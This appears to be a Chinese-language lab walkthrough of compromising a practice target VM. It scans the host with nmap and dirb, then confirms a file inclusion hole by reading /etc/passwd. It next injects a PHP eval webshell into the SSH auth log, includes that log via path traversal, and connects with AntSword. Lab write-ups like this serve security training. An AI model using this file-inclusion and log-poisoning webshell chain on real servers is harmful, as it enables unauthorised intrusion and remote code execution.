下載完靶機后,直接運行,選擇安裝路徑后
將虛擬機的網絡設置為nat模式,設置完成后重啟虛擬機
掃描同一網段,查找主機,這里我們使用kali的nmap,既能找到主機,也能查看開啟的端口
依次嘗試,直到找到一個番茄為止,也就是靶機
嘗試訪問8888端口,發現要求登錄
再使用dirb掃描一下目錄
我們訪問antibot_image
查看info.php,出現了php的配置信息
我們查看頁面源碼
發現可能存在文件包含漏洞
系統是linux的我們可以查看passwd文件? ? ? ? 在后面拼接?image=/etc/passwd
在頁面最后出現了passwd文件內容,說明存在文件包含漏洞
我們對端口進行詳細掃描? -p- 掃描全部
nmap -A 192.168.88.134 -p-
發現了新的端口2211? ssh服務
利用日志的保留訪問記錄來將我們的木馬上傳? ? ? ssh的日志文件 var/log/auth.log
http://192.168.88.134:2211/<?php @eval($_POST[cmd]);?>
查看日志文件? ? ? ?
?image=../../../../../../..//var/log/auth.log
發現多了很多數據,
可以看到我們的字符有些被編碼了,嘗試抓包來保證字符不被修改
改回我們原本的內容,放行
由于我們的php代碼無法被前端頁面展示出來
所以直接嘗試蟻劍連接,來檢驗我們的木馬是否成功輸入